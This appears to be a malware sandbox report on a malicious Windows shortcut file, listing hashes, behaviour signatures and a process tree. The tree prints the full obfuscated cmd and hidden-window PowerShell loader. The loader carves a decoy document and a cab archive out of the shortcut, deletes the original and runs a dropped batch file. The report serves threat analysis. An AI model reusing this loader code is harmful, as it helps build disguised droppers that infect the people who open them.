Analysis

  • max time kernel
    118s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    11/06/2024, 04:49

General

  • Target

    00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk

  • Size

    33.0MB

  • MD5

    cfffb45df8f05d1cb5d9d95fd5a83e9e

  • SHA1

    4f069b3c3d4ecf90a7f8a3836ac957dfcd90e944

  • SHA256

    00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37

  • SHA512

    5426eb64c10ee748ab2ce0aad3d2b22045c837d6aff3e6da64b9bf9645ea99ca33ab6f7d92de924996eb7879ef65e7bcb607f621bd0483d592a8778e7919a319

  • SSDEEP

    768:vgAPVV/DKgF0JS3EaxNvnIBzHUUYNxHW0onSHzeN6ZC+v1ElH5qwpf2NyDkLmRvN:vtPu35RTnnSHzeNcfSfy6RvN

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\00b6a18a47bdecbf3f97e0a9188e0080a59d87beb4002e8775b036ddee978d37.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1744
    • C:\Windows\syswow64\cmd.exe
      "C:\Windows\syswow64\cmd.exe" /q /c Set a4qw7afej=etodrpyswhnli && call %a4qw7afej:~5,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~0,1%%a4qw7afej:~4,1%%a4qw7afej:~7,1%%a4qw7afej:~9,1%%a4qw7afej:~0,1%%a4qw7afej:~11,1%%a4qw7afej:~11,1% -%a4qw7afej:~8,1%%a4qw7afej:~12,1%%a4qw7afej:~10,1%%a4qw7afej:~3,1%%a4qw7afej:~2,1%%a4qw7afej:~8,1%%a4qw7afej:~7,1%%a4qw7afej:~1,1%%a4qw7afej:~6,1%%a4qw7afej:~11,1%%a4qw7afej:~0,1% %a4qw7afej:~9,1%%a4qw7afej:~12,1%%a4qw7afej:~3,1%%a4qw7afej:~3,1%%a4qw7afej:~0,1%%a4qw7afej:~10,1% "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      PID:2760
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden "$NiQttN1 = Get-Location;if($NiQttN1 -Match 'System32' -or $NiQttN1 -Match 'Program Files') {$NiQttN1 = 'C:\Users\Admin\AppData\Local\Temp'};$W7plh7D3zZI=@('.lnk');$urhLT9eZ3Vc = Get-ChildItem -Path $NiQttN1 -Recurse *.* -File | where {$_.extension -in $W7plh7D3zZI} | where-object {$_.length -eq 0x0210CCCC} | Select-Object -ExpandProperty FullName;$aqucL5hpsgw_ = New-Object System.IO.FileStream($urhLT9eZ3Vc, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$aqucL5hpsgw_.Seek(0x00001A0D, [System.IO.SeekOrigin]::Begin);$cqcRL0PBMTfs = New-Object byte[] 0x0000ABF6;$aqucL5hpsgw_.Read($cqcRL0PBMTfs, 0, 0x0000ABF6);$smRWm5tMSPXA = $urhLT9eZ3Vc.replace('.lnk','.hwpx');sc $smRWm5tMSPXA $cqcRL0PBMTfs -Encoding Byte;& $smRWm5tMSPXA;$aqucL5hpsgw_.Seek(0x0000C603, [System.IO.SeekOrigin]::Begin);$pyZmuKvG=New-Object byte[] 0x00000680;$aqucL5hpsgw_.Read($pyZmuKvG, 0, 0x00000680);$aqucL5hpsgw_.Close();Remove-Item -Path $urhLT9eZ3Vc -Force;$xGE_47GiT6=$env:programdata + '\MicrosoftEdge';mkdir $xGE_47GiT6;$oyYsDBuAJ=$xGE_47GiT6 + '\gewcdqa.c' + 'ab';sc $oyYsDBuAJ $pyZmuKvG -Encoding Byte;expand $oyYsDBuAJ -f:* $xGE_47GiT6;$fXoeoYo=$xGE_47GiT6 + '\parkonA.b' + 'at';&$fXoeoYo;Remove-Item -Path $oyYsDBuAJ -Force;"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2860

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads